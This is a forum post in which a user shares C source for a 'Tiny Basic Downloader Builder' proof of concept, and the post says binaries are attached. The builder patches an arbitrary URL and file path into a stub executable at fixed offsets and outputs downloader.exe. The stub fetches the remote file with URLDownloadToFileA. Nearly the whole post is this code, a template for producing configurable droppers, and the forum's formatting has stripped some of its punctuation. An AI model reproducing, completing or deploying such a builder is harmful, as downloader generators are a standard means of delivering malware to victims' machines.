View Single Post
  #1  
Old 09-18-2021, 23:09
YANiS YANiS is offline
Friend
 
Join Date: Sep 2021
Posts: 2
Rept. Given: 0
Rept. Rcvd 0 Times in 0 Posts
Thanks Given: 0
Thanks Rcvd at 4 Times in 2 Posts
YANiS Reputation: 0
Tiny Basic Downloader Builder (Proof of Concept)

PHP Code:
/*
    MSVC
    Tiny Basic Downloader Builder (Proof of Concept)
    by YANiS

    This code snippet is provided 'as is' without warranty of any kind.
    No malicious uses are allowed.
*/

#include <windows.h>
#include "resource.h"

BOOL CALLBACK DlgProc(HWND hwndUINT uMsgWPARAM wParam,LPARAM lParam) {

    
unsigned char url[50] = {0};
    
unsigned char path[50] = {0};

    switch (
uMsg) {
    case 
WM_CLOSE:
        
EndDialog(hwnd0);
        break;

    case 
WM_INITDIALOG:
        
SetWindowTextA(hwnd"Basic Downloader Builder (Proof of Concept)");
        
SendDlgItemMessageA(hwndIDC_URLEM_LIMITTEXT500);
        
SendDlgItemMessageA(hwndIDC_PATHEM_LIMITTEXT500);
        
SetFocus(GetDlgItem(hwndIDC_URL));
        return 
FALSE;

    case 
WM_COMMAND:
        switch(
LOWORD(wParam)) {

        case 
IDB_BUILD:

            if((
GetDlgItemTextA(hwndIDC_URL, (LPSTR)url50+1) < 5) || (GetDlgItemTextA(hwndIDC_PATH, (LPSTR)path50+1) < 5) ) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: URL or PATH error!");
                return 
1;
            }

            
unsigned char *lpBuffer NULL;
            
size_t fileSize 0;

            
HANDLE hFile CreateFileA("stub.bin",
                                       
GENERIC_READ,
                                       
FILE_SHARE_READ,
                                       
NULL,
                                       
OPEN_EXISTING,
                                       
FILE_ATTRIBUTE_NORMAL,
                                       
NULL);

            if (
hFile == INVALID_HANDLE_VALUE) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: CreateFile error!");
                return 
1;
            }

            
fileSize GetFileSize(hFile0);
            if (
fileSize == 0) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: GetFileSize error!");

                
CloseHandle(hFile);
                return 
1;
            }

            
lpBuffer = (unsigned char *)VirtualAlloc(NULL,
                       
fileSize,
                       
MEM_COMMIT,
                       
PAGE_READWRITE);

            if (
lpBuffer == NULL) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: VirtualAlloc error!");
                
CloseHandle(hFile);
                return 
1;
            }

            
DWORD bytesRead;
            if (!
ReadFile(hFile,
                          
lpBuffer,
                          
fileSize,
                          &
bytesRead,
                          
NULL) || bytesRead != fileSize) {

                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: ReadFile error!");
                return 
1;
            }
            
CloseHandle(hFile);
            
#ifdef _WIN64
            
strcpy((char*)(lpBuffer 0x230), (char*)url);  // for stub 64-bit
            
strcpy((char*)(lpBuffer 0x268), (char*)path); // for stub 64-bit
#else            
            
strcpy((char*)(lpBuffer 0x218), (char*)url);  // for stub 32-bit
            
strcpy((char*)(lpBuffer 0x24C), (char*)path); // for stub 32-bit
#endif

            
hFile CreateFileA("downloader.exe",
                                
GENERIC_WRITE,
                                
0,
                                
NULL,
                                
CREATE_ALWAYS,
                                
FILE_ATTRIBUTE_NORMAL,
                                
NULL);

            if (
hFile == INVALID_HANDLE_VALUE) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: WriteFile error!");
                return 
1;
            }

            
DWORD bytesWritten;
            
WriteFile(hFile,
                      
lpBuffer,
                      
fileSize,
                      &
bytesWritten,
                      
NULL);

            
CloseHandle(hFile);

            
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: FINISHED");
            break;
        }
    default:
        return 
FALSE;
    }
    return 
TRUE;
}

int main() {
    
DialogBoxParamA(GetModuleHandleA(NULL),
                    
MAKEINTRESOURCE(IDD_BUILDER),
                    
NULL,
                    (
DLGPROC)DlgProc,
                    (
LPARAM)NULL);
    return 
0;

PHP Code:
/*
    MSVC
    Tiny Basic stub with markers
    by YANiS

    This code snippet is provided 'as is' without warranty of any kind.
    No malicious uses are allowed.
*/

#include <windows.h>
#include <urlmon.h>

#define URL_MARKER            "[url_marker......................................]"
#define FILE_PATH_MARKER    "[file_marker.....................................]"

void main() {

    
URLDownloadToFileA(NULL,                // LPUNKNOWN pCaller,
                       
URL_MARKER,            // LPCSTR szURL,
                       
FILE_PATH_MARKER,    // LPCSTR szFileName,
                       
0,                    // DWORD dwReserved,
                       
NULL);                // LPBINDSTATUSCALLBACK lpfnCB

    
MessageBoxA(NULL,
                
URL_MARKER,
                
FILE_PATH_MARKER,
                
MB_ICONINFORMATION);


    
ExitProcess(0);

Source and binaries (X86, X64, arm32 and arm64) attached.
Attached Files
File Type: rar tiny_builder_stub_POC.rar (10.7 KB, 7 views)
Reply With Quote
The Following User Says Thank You to YANiS For This Useful Post:
Stingered (09-20-2021)